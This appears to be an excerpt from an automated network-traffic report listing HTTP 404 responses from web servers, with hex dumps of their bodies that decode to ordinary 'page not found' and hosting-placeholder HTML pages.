              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 70 6c 22 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 41 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 43 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 64 68 6f 73 74 69 6e 67 2e 70 6c 20 2d 20 70 6f 64 20 74 79 6d 20 61 64 72 65 73 65 6d 20 6e 69 65 20 7a 6e 61 6a 64 75 6a 65 20 73 69 c4 99 20 c5 bc 61 64 65 6e 20 73 65 72 77 69 73 20 57 57 57 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 7b 0d 0a 66 6f 6e 74 3a 20 31 32 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 23 33 33 33 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 69 6d 67 7b 0d 0a 62 6f 72 64 65 72 3a 30 70 78 3b 0d 0a 7d 0d 0a 61 3a 68 6f 76 65 72 2c 20 61 3a 61 63 74 69 76 65 7b 0d 0a 63 6f 6c 6f 72 3a 23 30 30 30 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 7d 0d 0a 23 74 72 65 73 63 7b 0d 0a 66 6f 6e 74 3a 20 31 32 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 7d 0d 0a 23 66 6f 6f 74 7b 0d 0a 66 6f 6e 74 3a 20 31 30 70 78 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 63 6f 6c 6f 72 3a 23 36 30 36 30 36 30 3b 0d 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0d 0a 62 6f 74 74 6f 6d 3a 35 70 78 3b 0d 0a 77 69 64 74 68 3a 39 39 25 3b 0d 0a 7d 0d 0a 0d 0a 2e 66 3a 6c 69 6e 6b 2c 20 2e 66 3
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Date: Tue, 02 Jul 2024 12:08:58 GMT
              Server: Apache
              Content-Length: 16026
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Date: Tue, 02 Jul 2024 12:09:01 GMT
              Server: Apache
              Content-Length: 16026
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Date: Tue, 02 Jul 2024 12:09:03 GMT
              Server: Apache
              Content-Length: 16026
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Date: Tue, 02 Jul 2024 12:09:06 GMT
              Server: Apache
              Content-Length: 16026
              Connection: close
              Content-Type: text/html; charset=utf-8
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Server: nginx
              Date: Tue, 02 Jul 2024 12:09:12 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Content-Encoding: gzip
              Data Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb dc 92 61 cf f1 cd 2d 3f 70 3b 75 4b 97 d7 5d c7 eb 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 14 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 05 65 c1 0c 39 8a 7c d3 0e 43 0c 3f e9 ef 60 09 59 eb 0d 09 99 7c cf c4 9f d5 e5 92 20 dd 41 55 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 b7 cc 28 90 76 7f 8d 1b 5c f4 65 47 34 c4 c6 c8 b3 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 3a 48 3a 98 f0 3d 17 cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 48 66 e1 51 b4 c1 16 7e 66 b9 08 2e 30 1a 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 b1 da f6 3b e3 0c d5 6d 63 08 5b 09 fd af 45 e6 6b a5 48 e5 32 c6 ec e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 de 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 44 ed b3 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f1 4c b8 ae 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d0 ad 36 3c be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e5 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 12 16 36 62 b3 f4 fc 30 02 81 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 0e 67 f4 96 9b f5 e1 e2 7e 1d a5 11 0c 37 7d 76 3b d5 db 41 33 de d5 a6 8a 9f 90 0d e3 27 6c d7 07 fb 2c 39 a5 ee e1 a2 25 b7 47 51 e4 7b 61 a6 6b ac b9 00 00 5d 09 29 f5 07 18 c0 f5 83 16 5b 58 79 36 c1 2c ad 08 9d f7 54 0b b6 1f 48 97 0d 91 ea 33 ef 9f eb 2e 6d cf 46 01 17 17 86 18 ca 4e 07 26 6a b9 84 9a 59 d4 11 31 6b e4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 01 62 96 b7 97 e4 60 b8 82 f6 ad d0 1f 05 b6 6a 64 d3 13 23 97 9a bf a1 11 08 81 a2 b8 56 72 98 a2 ec 4c d9 05 3f 3c 78 2d 1d 7f 20 9d 9c d8 33 67 29 88 ad 1b 58 9e da b2 56 47 d1 20 93 6c 9f e4 54 47 71 65 34 c8 a4 5e a2 22 1b 2b 92 4e d7 6b 84 50 90 d7 69 61 9c 83 17 19 ff 03 80 f8 6f bc 23 92 8f e2 bd e4 93 e4 a6 88 ef 67 5c 70 b4 e0 7e e1 50 7a 73 b0 3a 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jul 2024 12:09:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb dc 92 61 cf f1 cd 2d 3f 70 3b 75 4b 97 d7 5d c7 eb 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 14 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 05 65 c1 0c 39 8a 7c d3 0e 43 0c 3f e9 ef 60 09 59 eb 0d 09 99 7c cf c4 9f d5 e5 92 20 dd 41 55 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 b7 cc 28 90 76 7f 8d 1b 5c f4 65 47 34 